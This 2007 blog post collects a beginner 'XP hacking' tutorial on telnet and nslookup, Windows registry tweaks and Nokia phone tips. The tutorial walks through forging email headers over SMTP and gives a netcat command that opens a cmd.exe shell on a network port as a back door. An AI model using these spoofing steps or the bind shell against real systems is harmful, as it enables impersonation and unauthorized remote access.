Friday, May 4, 2007

XPHacking With Windows XP

So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How
can you use XP in a way that sets you apart from the boring millions of ordinary
users?

The key to doing amazing things with XP is as simple as D O S. Yes, that's
right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as
well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS
version. Various versions of command.com come with Windows 95, 98, SE, ME,
Window 3, and DOS only operating systems.

The other DOS, which comes only with XP, 2000 and NT, is cmd.exe. Usually
cmd.exe is better than command.com because it is easier to use, has more
commands, and in some ways resembles the bash shell in Linux and other Unix-type
operating systems. For example, you can repeat a command by using the up arrow
until you back up to the desired command. Unlike bash, however, your DOS command
history is erased whenever you shut down cmd.exe. The reason XP has both
versions of DOS is that sometimes a program that won?t run right in cmd.exe will
work in command.com

note : m not comparing bash to dos


DOS is your number one Windows gateway to the Internet, and the open sesame to
local area networks. From DOS, without needing to download a single hacker
program, you can do amazingly sophisticated explorations and even break into
poorly defended computers.


****************
You can go to jail warning: Breaking into computers is against the law if you do
not have permission to do so from the owner of that computer. For example, if
your friend gives you permission to break into her Hotmail account, that won't
protect you because Microsoft owns Hotmail and they will never give you
permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for
bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN
permission before demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying
something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type
"help" at the DOS prompt, it gives you a long list of commands. However, this
list leaves out all the commands hackers love to use. Here are some of those
left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can
guess by the name, TCP/IP is the protocol under which the Internet runs. along
with user datagram protocol (UDP). So when you are connected to the Internet,
you can try these commands against other Internet computers. Most local area
networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate
between computers. This is often used by Windows computers, and by Unix/Linux
type computers running Samba. You can often use NetBIOS commands over the
Internet (being carried inside of, so to speak, TCP/IP). In many cases, however,
NetBIOS commands will be blocked by firewalls. Also, not many Internet computers
run NetBIOS because it is so easy to break in using them. I will cover NetBIOS
commands in the next article to XP Hacking.

The queen of hacker commands is telnet. To get Windows help for telnet, in the
cmd.exe window give the command:

C:\>telnet /?

Here's what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]

-a Attempt automatic logon. Same as --l option except uses the currently logged
on user's name.
-e Escape character to enter telnet cclient prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system. Requires that
the remote system support the TELNET ENVIRON option.
-t Specifies terminal type. Supportedd term types are vt100, vt52, ansi and vtnt
only.
host Specifies the hostname or IP address of the remote computer to connect to.
port Specifies a port number or service name.


****************
Newbie note: what is a port on a computer? A computer port is sort of like a
seaport. It's where things can go in and/or out of a computer. Some ports are
easy to understand, like keyboard, monitor, printer and modem. Other ports are
virtual, meaning that they are created by software. When that modem port of
yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has
the ability to open or close any of over 65,000 different virtual ports, and has
the ability to connect to any of these on another computer - if it is running
that port, and if a firewall doesn?t block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two
ways: by number or by name.
****************

The simplest use of telnet is to log into a remote computer. Give the command:

C:/>telnet targetcomputer.com (substituting the name of the computer you want to
telnet into for targetcomputer.com)

If this computer is set up to let people log into accounts, you may get the
message:

login:

Type your user name here, making sure to be exact. You can't swap between lower
case and capital letters. For example, user name Guest is not the same as guest.

****************
Newbie note: Lots of people email me asking how to learn what their user name
and password are. Stop laughing, darn it, they really do. If you don't know your
user name and password, that means whoever runs that computer didn't give you an
account and doesn't want you to log on.
****************

Then comes the message:

Password:

Again, be exact in typing in your password.

What if this doesn't work?

Every day people write to me complaining they can't telnet. That is usually
because they try to telnet into a computer, or a port on a computer that is set
up to refuse telnet connections. Here's what it might look like when a computer
refuses a telnet connection:

C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A
connection attempt failed because the connected party did not properly respond
after a period of time, or established connection failed because connected host
has failed to respond.

Or you might see:

C:\ >telnet hotmail.com
Connecting To hotmail.com...Could not open connection to the host, on port
23. No connection could be made because the target machine actively refused it.

If you just give the telnet command without giving a port number, it will
automatically try to connect on port 23, which sometimes runs a telnet server.

**************
Newbie note: your Windows computer has a telnet client program, meaning it will
let you telnet out of it. However you have to install a telnet server before
anyone can telnet into port 23 on your computer.
*************

If telnet failed to connect, possibly the computer you were trying to telnet
into was down or just plain no longer in existence. Maybe the people who run
that computer don't want you to telnet into it.

Even though you can't telnet into an account inside some computer, often you can
get some information back or get that computer to do something interesting for
you. Yes, you can get a telnet connection to succeed -without doing anything
illegal --against almost any computer, even if you don't have permission to log
in. There are many legal things you can do to many randomly chosen computers
with telnet. For example:

C:/telnet freeshell.org 22

SSH-1.99-OpenSSH_3.4p1

That tells us the target computer is running an SSH server, which enables
encrypted connections between computers. If you want to SSH into an account
there, you can get a shell account for free at http://freeshell.org . You can
get a free SSH client program from http://winfiles.com .

***************
You can get punched in the nose warning: Your online provider might kick you off
for making telnet probes of other computers. The solution is to get a local
online provider and make friends with the people who run it, and convince them
you are just doing harmless, legal explorations.
*************

Sometimes a port is running an interesting program, but a firewall won't let you
in. For example, 10.0.0.3, a computer on my local area network, runs an email
sending program, (sendmail working together with Postfix, and using Kmail to
compose emails). I can use it from an account inside 10.0.0.3 to send emails
with headers that hide from where I send things.

If I try to telnet to this email program from outside this computer, here's what
happens:

C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3...Could not open connection to the host, on port 25. No
connection could be made because the target machine actively refused it.

However, if I log into an account on 10.0.0.3 and then telnet from inside to
port 25, here's what I get:

Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun...
cmeinel@test-box:~> telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical address meaning
localhost, the same computer you are logged into]
Connected to localhost.
Escape character is '^]'.
220 test-box.local ESMTP Postfix

The reason I keep this port 25 hidden behind a firewall is to keep people from
using it to try to break in or to forge email. Now the ubergeniuses reading this
will start to make fun of me because no Internet address that begins with 10. is
reachable from the Internet. However, sometimes I place this "test-box" computer
online with a static Internet address, meaning whenever it is on the Internet,
it always has the same numerical address. I'm not going to tell you what its
Internet address is because I don't want anyone messing with it. I just want to
mess with other people's computers with it, muhahaha. That's also why I always
keep my Internet address from showing up in the headers of my emails.

***************
Newbie note: What is all this about headers? It's stuff at the beginning of an
email that may - or may not - tell you a lot about where it came from and when.
To see full headers, in Outlook click view -> full headers. In Eudora, click the
"Blah blah blah" icon.
****************

Want a computer you can telnet into and mess around with, and not get into
trouble no matter what you do to it? I've set up my techbroker.com
(206.61.52.33) with user xyz, password guest for you to play with. Here's how to
forge email to xyz@techbroker.com using telnet. Start with the command:

C:\>telnet techbroker.com 25
Connecting To Techbroker.com

220 Service ready

Now you type in who you want the message to appear to come from:

helo santa@techbroker.com
Techbroker.com will answer:

250 host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed

Your next command:
data
354 Start main input; end with .


just means hit return. In case you can't see that little
period between the s, what you do to end composing your email is to hit
enter, type a period, then hit enter again. Anyhow, try typing:

This is a test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the message we
just composed looks like:

Status: R
X-status: N

This is a test.

That's a pretty pathetic forged email, huh? No "from", no date. However, you can
make your headers better by using a trick with the data command. After you give
it, you can insert as many headers as you choose. The trick is easier to show
than explain:

220 Service ready
helo santa@northpole.org
250 host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:cmeinel@techbroker.com
250 Requested mail action okay, completed
data
354 Start main input; end with .
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.

The trick is to start each line you want in the headers with one word followed
by a colon, and the a line followed by "return". As soon as you write a line
that doesn't begin this way, the rest of what you type goes into the body of the
email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up
in the header. Some mail servers would show both "from" addresses.

You can forge email on techbroker.com within one strict limitation. Your email
has to go to someone at techbroker.com. If you can find any way to send email to
someone outside techbroker, let us know, because you will have broken our
security, muhahaha! Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet:

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:
user xyz
+OK user is known

Then type in this:
pass test
+OK mail drop has 2 message(s)

retr 1
+OK message follows
This is a test.

If you want to know all possible commands, give this command:

help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP

Unless you use a weird online provider like AOL, you can use these same tricks
to send and receive your own email. Or you can forge email to a friend by
telnetting to his or her online provider's email sending computer(s).

With most online providers you need to get the exact name of their email
computer(s). Often it is simply mail.targetcomputer.com (substitute the name of
the online provider for targetcomputer). If this doesn't work, you can find out
the name of their email server with the DOS nslookup program, which only runs
from cmd.exe. Here's an example:


C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

> set q=mx
> dimensional.com
Server: DNS1.wurld.net
Address: 206.61.52.11

dimensional.com MX preference = 5, mail exchanger =
mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com
dimensional.com nameserver = ns.dimensional.com
dimensional.com nameserver = ns-1.dimensional.com
dimensional.com nameserver = ns-2.dimensional.com
dimensional.com nameserver = ns-3.dimensional.com
dimensional.com nameserver = ns-4.dimensional.com
mail.dimensional.com internet address = 206.124.0.11
mx2.dimensional.com internet address = 206.124.0.30
mx3.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.10
ns.dimensional.com internet address = 206.124.26.254
ns.dimensional.com internet address = 206.124.0.254
ns.dimensional.com internet address = 206.124.1.254
ns.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.32
ns.dimensional.com internet address = 206.124.0.30
ns.dimensional.com internet address = 206.124.0.25
ns.dimensional.com internet address = 206.124.0.15
ns.dimensional.com internet address = 206.124.0.21
ns.dimensional.com internet address = 206.124.0.9
ns-1.dimensional.com internet address = 206.124.26.254
ns-2.dimensional.com internet address = 209.98.32.54
ns-3.dimensional.com internet address = 206.124.1.254
ns-4.dimensional.com internet address = 206.124.0.254
>

The lines that tell you what computers will let you forge email to people with
@dimensional.com addresses are:

dimensional.com MX preference = 5, mail exchanger =
mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com

MX stands for mail exchange. The lower the preference number, the more they
would like you to use that address for email.If that lowest number server is too
busy, then try another server.

Sometimes when you ask about a mail server, nslookup will give you this kind of
error message:

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to [207.217.120.202] timed-out

To get around this problem, you need to find out what are the domain servers for
your target online provider. A good place to start looking is
http://netsol.com/cgi-bin/whois/whois . If this doesn't work, see
http://happyhacker.org/HHA/fightback.shtml for how to find the domain servers
for any Internet address.

****************
Newbie note: A domain name server provides information on the names and numbers
assigned to computers on the Internet. For example, dns1.wurld.net and
dns2.wurld.net contain information on happyhacker.org, techbroker.com,
securitynewsportal.com, thirdpig.com and sage-inc.com. When you query
dns1.wurld.net about other computers, it might have to go hunting for that
information from other name servers. That's why you might get a timed out
failure.
***************

Once you know the domain servers for an online service, set one of them for the
server for your nslookup program. Here's how you do it:

C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

Now give the command:

> server 207.217.126.41
Default Server: ns1.earthlink.net
Address: 207.217.126.41

Next command should be:
> set q=mx
> earthlink.net
Server: ns1.earthlink.net
Address: 207.217.126.41

earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net
earthlink.net nameserver = ns3.earthlink.net
earthlink.net nameserver = ns1.earthlink.net
earthlink.net nameserver = ns2.earthlink.net
mx00.earthlink.net internet address = 207.217.120.28
mx01.earthlink.net internet address = 207.217.120.29
mx02.earthlink.net internet address = 207.217.120.79
mx03.earthlink.net internet address = 207.217.120.78
mx04.earthlink.net internet address = 207.217.120.249
mx05.earthlink.net internet address = 207.217.120.31
mx06.earthlink.net internet address = 207.217.120.23
ns1.earthlink.net internet address = 207.217.126.41
ns2.earthlink.net internet address = 207.217.77.42
ns3.earthlink.net internet address = 207.217.120.43
>

Your own online service will usually not mind and may even be glad if you use
telnet to read your email. Sometimes a malicious person or faulty email program
will send you a message that is so screwed up that your email program can't
download it. With telnet you can manually delete the bad email. Otherwise tech
support has to do it for you.

If you think about it, this ability to forge email is a huge temptation to
spammers. How can your online provider keep the bad guys from filling up a
victim's email box with garbage? The first time a bad guy tries this, probably
nothing will stop him or her. The second time the online provider might block
the bad guy at the firewall, maybe call the bad guy's online provider and kick
him or her and maybe get the bad guy busted or sued.

**************
You can go to jail warning: Sending hundreds or thousands of junk emails to bomb
someone's email account is a felony in the US.
***************

***************
You can get sued warning: Spamming, where you send only one email to each
person, but send thousands or millions of emails, is borderline legal. However,
spammers have been successfully sued when they forge the email addresses of
innocent people as senders of their spam.
****************

Now that you know how to read and write email with telnet, you definitely have
something you can use to show off with. Happy hacking!

Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a
free program written by Weld Pond and Hobbit, and available from many sites, for
example
http://www.atstake.com/research/tools/#network_utilities . It is basically
telnet on steroids. For example, using netcat, you can set up a port on your
Windows computer to allow people to telnet into a DOS shell by using this
command:

C:\>nc -L -p 5000 -t -e cmd.exe

You can specify a different port number than 5000. Just make sure it doesn't
conflict with another port by checking with the netstat command. Then you and
your friends, enemies and random losers can either telnet in or netcat in with
the command:

C:\>nc -v [ipaddress of target] [port]

Of course you will probably get hacked for setting up this port. However, if you
set up a sniffer to keep track of the action, you can turn this scary back door
into a fascinating honeypot. For example, you could run it on port 23 and watch
all the hackers who attack with telnet hoping to log in. With some programming
you could even fake a unix-like login sequence and play some tricks on your
attackers.

Windows Secrets

Windows Secrets :::
Restoring a Lost Desktop

If you ever lose the Desktop but Explorer is still running with the Start Button,
you can do this to bring back your Desktop in a Windows box.

1 Click Start
2 Click Run
3 Type a period " . "
4 Then press Enter


Creating a New E-Mail Shortcut

To create a shortcut that will open your default e-mail program starting a new e-mail,

1 Right click on an open area of the desktop
2 Select New / Shortcut
3 For the Command Line, enter mailto:
4 For the title enter something like New E-Mail
5 When you click on this your default e-mail program should start with a new e-mail form.


Creating 3D Window Effect

You can create a nice 3D effect for your windows

1 Start Regedit
2 Go to HKEY_CURRENT_USER \ Control Panel \ Colors
3 Make sure the following setting are there:
4 ButtonHilight=128 128 128
5 ButtonShadow=255 255 255

Creating Shutdown, Restart and Logoff Icons

To create the icons, create a shortcut on the desktop.

For Shutdown, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows

For Restart, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec

For Logoff, the command is C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0


Having your Favorites and Start Menus Sort Alphabetically

If your Start Menu Program or Favorites are not sorting alphabetically, it is easy to fix this:

1 Start Regedit
2 Go to HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/MenuOrder
3 Under here is are Favorites and Start Menu folders
4 In each there is a value called Order
5 Simply delete (or rename this) and restart Winodws
6 Your Favorites or Start Menus should now sort alphabetically




Srini 1/27/2007 9:01 AM
Increasing the Icon Cache

1 Run Regedit
2 Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer
3 Create a new string called Max Cached Icons
4 Give it a value of 10000
5 This will increase response time in windows and give the Shellicon cache file more elbow room.


Make Icons 256 Color 16-Bit

1 Open the Registry
2 Hit Ctrl+F
3 Type Shell Icon BPP
4 When found, right click the Shell Icon BPP icon
5 Click Modify
6 Change the value from 4 to 16
7 Click Ok
8 Close the registry
9 Restart your computer

Removing Shortcut Arrows

An easy way to remove those irritating arrows from your desktop shortcut icons and not change their properties

1 Right click the Desktop / Properties / Appearance tab
2 Select Item
3 Scroll for Icon
4 The default size is 32
5 Change this to 30
6 Clicking Apply


Adding the Control Panel to the Start Menu

1 Open up the Explorer
2 Go to \WINDOWS\Start Menu
3 Right click in the right-hand panel
4 Add a new folder
5 Name it Control Panel.{21ec2020-3aea-1069-a2dd-08002b30309d}
6 This makes getting to the Control Panel items a little easier

Making Desktop Changes Permanent

To make changes to the Desktop like window size, positon after rebooting:

1 Start Regedit
2 Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3 Create a New Binary Value
4 Name it NoSaveSettings
5 Give it a value of 01 00 00 00

Srini 1/27/2007 9:01 AM
Easy Shortcuts on the Desktop

Here is an easy way to put shortcuts on the Desktop where they can easily be moved to other group icons.

1 Using the Explorer, create a SHORTCUT to the \Windows\Desktop directory in your \Windows\SEND TO directory.
2 Now whenever you want to make a shortcut and move it to the desktop:
3 Just make the shortcut you want using Explorer
4 Right click on that shortcut
5 In the pop up menu select the Send To and Desktop shortcut.

Changing a Folder's Icon

To change the icon of a Folder on desktop:

1 Using the Explorer, move the folder from the Desktop directory to another directory on the hard drive
2 Right click on the new folder and select "Create Shortcut"
3 Move the shortcut to the Desktop
4 Right click and select a new icon

Tricks n Hacks n Tips

Symbian Phones (.sis) n Others...



Tips n Tricks



Tip 1 : Do u know how to use the edit button (abc or pencil button)?Heres how... in the inbox for example; u wanna delete multiple sms, simply hold the edit button, scroll down, and then, press c to delete the marked sms. The edit button can also b used to copy and past text in sms, simply hold it and scroll across, choose copy. pretty good for placing song names in ngages


Tip 2 : Shit happens, on a smartphone, its inevitable u do something wrong, and tis calls for a format of fone. to format the fone, press *#7370#, then enter the lock code, which is the sec code of the fone. NOTE: batt must b full, else if format is disrupted by low batt, consequences will b disatrous I heard the code *#7780# works too, pretty much the same i tink.


for 6600 users, to format the fone, theres an alternative way. Press and hold <3>, <*>, and the buttons, then power on fone, keep holding on the 3 buttons, till u come to a format screen. tis method ONLY works on 6600, and need not enter the sec code. BUT sec code wun be reset to default 12345.


Tip 3 : TO NGAGE USERS; Did u know u can install .sis files simply using the cable given? Juz plug it in, place the .sis file anywhere on e: (the mmc), not in any folders, root of e:, disconnect, then look for it in manager.


Tip 4: Save on battery and system memory being used by regulary checking the task manager which can be accessed by holding down the menu button!!
Tip 4a: Set the screen saver to a short time out period to prolong battery life.
Tip 4b: Avoid restarting the phone, or repeatedly turning it on and off. This helps increase battery life.


Tip 7: If you would like to avoid being "blue jacked", keep bluetooth turned off, or set your phone's visibility to hidden.



Tip 9: Save memory when installing apps, by installing over bluetooth. This can be done using the nokia phone suite and a bluetooth serial connection. Only works with .SIS files, so java still has to be sent to the phone, but will save space when using .SIS files.



Tip 10: Operator logosUse a filemanager like FExplorer or SeleQ to add the folders: "c:/system/Apps/phone/oplogo". Add a .bmp picture to folder "oplogo" and restart your phone! The .bmp picture size needs to be: 97 x 25 pixels



Tip 11: Check if the recepients phone is onDelivery reports
or
Type *0# your message in the message composer window space then write your message, the recipient will not see the star zero hash bit - just the message When they read it it will relay a message back to your fone showing the time they recieved it. (haven't yet tried it myself though)


Tip 12: BlueJacking
First up, you need to know what Bluetooth is. There are lots of types of modern devices that incorporate Bluetooth as one of their many features. PDAs, mobile phones and laptops are a few of these modern devices. Bluetooth means that Bluetooth enabled devices can send things like phonebook/address book contacts, pictures & notes to other Bluetooth enabled devices wirelessly over a range of about 10 metres. So, we've got past the boring part. Now, using a phone with Bluetooth, you can create a phonebook contact and write a message, eg. 'Hello, you've been bluejacked', in the 'Name' field. Then you can search for other phones with Bluetooth and send that phonebook contact to them. On their phone, a message will popup saying "'Hello, you've been bluejacked' has just been received by Bluetooth" or something along those lines. For most 'victims' they will have no idea as to how the message appeared on their phone.



Tip 13: While you are viewing a picture in your phone's gallery, press one of these shortcut keys (definitely works on 6600, not sure about other symbians)1 - turn image anticlockwise3 - turn image clockwise* - toggle on/off of full screen5 - zoom in0 - zoom out


#15 u can select all files in a folder by selecting THE folder and copy it then paste it somewhere. however u need to make a new directory. fexplorer wun let u copy that folder together. well seleQ can mark files to copy but it really takes time!


#16: A soft and Hard resetA Soft-reset - the process of resetting all the settings of the phone to the factory default! No applications are deleted! A Hard-reset is like formatting a drive! It does format the memory. Everything that has been installed after the first use of the phone is deleted! It will recover the memory of the phone to the state you purchased it! It is done by inputing the following code: *#7370# NOTE: The battery must be full or the charger has to be connected to the phone so that it does not run out of power and make the phone unusable.


#17: Formats of images
supported ones: JPG UPF GIF87a/89a WBMB MBM TIFF/F PNG EXIF
How to copy & paste text in your Nokia 3650:Press and hold the pencil key and select your text using the scroll key.Left function key will change to 'Copy'. Press it to copy the selected text to clipboard.You can paste the clipboard contents the same way:press and hold the pencil key and press 'Paste'. Or, press pencil key once and select 'Paste'.
Press and hold the Menu key to open the application switching window, where you can *duh* switch between applications.If a program hangs and you can't shut it down, select the application in theapplication switching window and press 'C' to kill it. It's also a faster way to exit programs.


Turn on/off the "click" sound made by the camera by selecting the 'Silent' profile or by turning warning tones on/off:Menu > Profiles > "select your activated profile" > Personalise > Warning tones > On/Off.(This also effects the sound of Java games and apps).


To change background image go to:Menu > Tools > Settings > Phone > Standby mode > Background image > Yes > "choose an image".The best size for background images is 174x132 pixels.


Only got blue, green and purple in your 3650 colour palette?This free app adds 3 more colours: Palette Extender.


Display an image when someone's calling:Menu > Contacts > "select a contact card" > Options > Edit > Options > Add thumbnail > "choose an image".
Add a personal ringing tone to a contact:Menu > Contacts > "select a contact card" > Options > Open > Options > Ringing tone > "choose a ringing tone".
Delete all messages from your Inbox at once:Menu > Messaging > Inbox > Options > Mark/Unmark > Mark all > Options > Delete.


Send or hide your caller ID: Go to: Menu > Tools > Settings > Call > Send MyCaller ID > 'Yes', 'No' or 'Set By Network' to follow the default settings of your home network.


If you often copy large files to your MultiMedia Card, I recommend a card reader.E.g. With a card reader it takes only 12 seconds to copy a 10 MB file!


Record the sound of a phone call using the (sound) Recorder.Menu > Extra's > Recorder > Options > Record sound clip.Note: short beeps are audible during call registration.But there is a 60 second limitation so if you want unlimited sound recording get this app: Extended Recorder.


While writing text, press "#" to switch between upper and lower case and Dictonary on/off (predictive text input).Press and hold "#" to switch between Alpha mode and Number mode.


Keyboard shortcuts for zooming and rotating images in Images:1 = zoom in, 0 = zoom out, press and hold to return to the normal view.2 = rotate anticlockwise, 9 = rotate clockwise, * = full screen.


In standby mode, press and hold the right soft key to activate voice dialling.To add a voice tag to a phone number, open a contact card and scroll to the phone number and select:Options > Add voice tag.


You can customize both soft keys located below the screen (in standby mode):Menu > Tools > Settings > Phone > Standby mode > Left/Right selection key > "select an application".


In standby mode. press scroll key center (joystick) to go directly to Contacts.
In standby mode, press and hold 0 to launch your wap home page.
In Menu or any subfolder, press numbers 1 - 9 to start the application at that location.123456789


In standby mode,45# + dials the number on your sim in memory slot 45.50# + dials slot 50 and so on.

If you have your keylock activated just press the on/off button to turn on your backlightto look at the time when it's dark without having to unlock the keypad.
Never, ever, in your whole life, install WildSkinz on your Nokia 3650!!! WildSkinz screws upthe whole 3650 system. It was never intended to work on the 3650, only on the 7650.

Why assigning Video Recorder in the right or left soft key does not work?
(Sound Recorder is launched instead of Video Recorder)It's a bug with firmware version 2.50.


How to check your firmware version:
A "Firmware" is the phone's operating system stored in internal Flash memory of the device (disk Z.Manufacturers release new firmware versions containing bug fixes, improvements and - sometimes - offering new functions.Firmware upgrade can only be made in authorized Nokia service centre (point).To check your current firmware version simply type *#0000# on main Phone screen.
·

Start up in Safe Mode so no 'auto start' apps will be running:
To make sure that no memory-resident programs start when you reboot your phone,hold down the pencil key when you turn on the phone and hold it on untill you have to enter your PIN code.(When you have trouble booting up the phone with the MMC in it because it got corrupted for some reason, this trick willalmost always let you boot up the phone so you can remove the latest installed app which might have caused theproblem or if your phone is "unrepairable" you can still back up your important data before you do a format.)


Q: How to totally format your Nokia 3650 and remove all installed applications, user files and restore allsettings to default like it's new out of the box? (OEM apps won't be deleted like Camera and RealOne Player).


A: First Format your MMC: Menu > Extras > Memory > Options > Format mem. card > Yes.Note: It is very important to format your MMC before you format your phone!Then format your phone by typing *#7370# on main Phone screen.Phone will ask: "Restore all original phone settings? Phone will restart." Press 'Yes' and enter your Lock code (default is 12345).Tip: Formatting takes several minutes so you'd better connect your Nokia 3650to a charger to ensure that your battery doesn't get empty in the middle of formatting.Note: All your created acces points and mailboxes will be lost so take a note of them. And all application settings will be reset.E.g. In Camera, image quality is set back to normal and memory in use is set back to phone memory. And also in Messages,memory in use is set back to phone memory, etc. Also backup your contacts with PC Suite or a program like Contacts Manager.
To reset your wallet, should you forget your code,
Type in:*#7370925538#
this will reset the wallet code, the wallet contents will be deleted.
-------------------------------------------------------------------------------------------


How to free more RAM on your phone

Method 1: Flight mode:
Put your phone in "Flight mode" with Psiloc System Tools. Install System Tools, open it and select "Flight mode". This way you can restart the phone without your SIM card so there will be no running phone tasks in the background. Now you can have up to 3,5 MB of free RAM!
Note: ironically enough, Flight mode doesn't work when Smart Launcher is installed, at least in my case. But i've also heard several reports of people who have both apps running without any problems.

Method 2: Smart Launcher trick:
Install Smart Launcher and open it. Go to Options, Settings and put Launcher ON.Now plug in your charger and switch off your phone. Wait untill the battery meter appears and short press the Menu button (don't hold).The menu should appear and now you can have 3,5 to 4,5 MB free RAM! (Hold Menu button to check RAM).
The trick is that with the charger plugged in, the phone must get a minimum software support for charging, even whenthe phone is switched off. And somehow Smart Launcher has still got it's shortcut running and that's the Menu button. So whenyou press the Menu button, you go directly to the Menu without any other phone tasks running in the background soyou trick the phone and you have more free RAM!Note: when you unplug the charger, the phone will switch off.


Method 3: Menu :
This method I found it by myself, it frees a little about 100~200 KB but I guess it's useful sometime
Close your menu not by selecting the right selection key "exit", or pressing the menu key another time, they only hide the menu app but do not close it, to close it select the left selection key "option" and scroll down and select "exit"
So when you open an app needs more ram reopen menu and close it, it's useful when play low bit rate video in realplayer paradis.

TopTricks for Windows Xp

Disabling Scandisk

When Windows is not shut down correctly, it will perform an AutoCheck
using CHKDSK on the next restart.

AutoCheck is executed after a short time delay. AutoCheck can be
disabled or delayed by tweaking a few Registry settings.
Run ‘Regedit’ from ‘Start Menu|Run...’
Go to ‘HKEY_LOCAL_MACHINE|SYSTE
M|CurrentControlSet|Control|Session
Manager’.
Create a new DWORD value, or
modify the existing value, called
“AutoChkTimeOut” and set it according
to the value data below.
Value Name: AutoChkTimeOut.
Data Type: REG_DWORD (DWORD Value).
Value Data: Time in Seconds or 0 to disable
(default = 10).
Exit your registry, you may need to
restart or log out of Windows for the
change to take effect.
Monitoring the system

There are various applications you can use to monitor the state of your
system at any given time. One of them is a program called CoolMon (www.coolmon.org) where you can monitor about 22 of
the most geekiest system parameters like the temperature and speed of your system fans, the number of processes running, the total available memory on your hard disk and RAM, CPU utilization, etc. Each
of these can be individually con. gured to appear on the interface. Best of all, this monitoring happens in real time. Better still, the program is free.
If you need more details than what is offered by Windows System Information or the Device Manager, try out an application called Everest Home Edition (www.lavalys.com). This application hunts through your hardware and software setup and extracts every piece of information you might need about your processor, motherboard, graphics card,
hard disk and any other piece of hardware or software information that you might care to know about your computer.
Compress drive to save disk space

its not possible to increase ur memory size but u can compress ur data to save ur disk space, this feature is available in NTFS drive..
if u have a fat or fat32 drive, u can convert it to ntfs by running a command on dos:
for c drive:
convert c:/fs:ntfs
for d drive:
convert d:/fs:ntfs
for e drive:
convert e:/fs:ntfs
run the command similarly if u have more drive...

Compresing data in NTFS

* open my computer
* select any drive(drive with NTFS format)
* right click and select properties
* click on general tab
* select "compress drive to save disk space"
* Apply and OK

ur data will remain safe...

Top Tricks n Cheats

Set Processes Priority

Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

CTRL-SHIFT-ESC
1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option

2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s
Shutdown Trick !

Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.


Speed Up Ur Shut down !!


Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).

and !

